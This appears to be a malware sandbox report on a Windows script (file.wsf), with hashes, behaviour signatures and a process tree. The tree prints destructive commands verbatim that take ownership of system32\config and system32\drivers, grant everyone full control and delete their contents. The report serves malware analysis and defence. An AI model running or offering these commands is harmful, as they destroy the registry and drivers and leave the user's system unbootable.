Analysis

  • max time kernel
    139s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:31

General

  • Target

    file.wsf

  • Size

    2KB

  • MD5

    b39eb8682deec9c7a7edcb64512655b0

  • SHA1

    d412384d9cfd8ec2333146eb1dd6c137543dabc7

  • SHA256

    9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

  • SHA512

    539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:440
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4260
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2168
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4840

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

    Filesize

    2KB

    MD5

    b39eb8682deec9c7a7edcb64512655b0

    SHA1

    d412384d9cfd8ec2333146eb1dd6c137543dabc7

    SHA256

    9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

    SHA512

    539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

  • C:\Users\Admin\Desktop\CheckpointWait.vbs

    Filesize

    98B

    MD5

    4b91264568ac2162700be36338c095e8

    SHA1

    c95726edf8303e6adabcb12ffdca90b51349990a

    SHA256

    2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037

    SHA512

    e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b